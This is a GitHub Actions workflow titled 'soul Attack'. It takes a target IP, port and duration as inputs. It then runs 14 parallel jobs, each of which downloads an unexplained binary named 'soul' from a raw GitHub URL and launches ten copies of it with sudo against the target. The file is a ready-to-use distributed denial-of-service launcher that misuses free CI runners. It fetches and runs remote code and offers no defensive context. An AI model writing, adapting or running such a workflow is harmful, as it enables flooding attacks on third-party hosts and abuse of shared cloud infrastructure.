name: soul Attack
on:
  workflow_dispatch:
    inputs:
      ip:
        description: 'Target IP'
        required: true
      port:
        description: 'Target Port'
        required: true
      time:
        description: 'Attack Duration'
        required: true

jobs:
  soul:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 14
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,11,12,13,14]
    steps:
    - name: Fast Binary Download
      run: |
        curl -sLO https://raw.githubusercontent.com/munirajaadhi140-crypto/soulcrack-tg/main/soul
        chmod +x soul
    - name: Execute 10 Parallel Attacks
      run: |
        for i in $(seq 1 10); do
          sudo ./soul ${{ github.event.inputs.ip }} ${{ github.event.inputs.port }} ${{ github.event.inputs.time }} &
        done
        wait
